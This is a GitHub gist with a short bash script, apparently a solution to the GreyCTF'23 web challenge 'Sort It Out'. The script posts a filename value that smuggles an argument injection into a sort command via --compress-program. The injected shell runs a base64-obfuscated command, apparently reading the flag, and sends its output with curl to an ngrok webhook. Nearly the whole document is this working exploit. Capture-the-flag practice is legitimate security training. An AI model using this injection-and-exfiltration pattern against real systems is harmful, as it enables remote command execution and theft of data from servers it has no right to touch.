Skip to content

Instantly share code, notes, and snippets.

@lebr0nli
Last active May 21, 2023 14:12
Show Gist options
  • Save lebr0nli/1d0f199d012591dd2d55ed8d72dd7dff to your computer and use it in GitHub Desktop.
Save lebr0nli/1d0f199d012591dd2d55ed8d72dd7dff to your computer and use it in GitHub Desktop.
Solution for GreyCTF'23 - Sort It Out (Web)
#!/bin/bash
WEBHOOK="0.tcp.jp.ngrok.io:11048"
curl -i -s -k -X $'POST' \
-H $'Host: 34.124.157.94:10556' -H $'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'filename=--compress-program=sh -z /proc/self/cmdline -o /tmp/lebr0nli`curl${IFS}-d${IFS}$($(echo${IFS}L3JlYWRmbGFnCg==|base64${IFS}-d))${IFS}'"$WEBHOOK"'`' \
$'http://34.124.157.94:10556/index.php' -o /dev/null
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment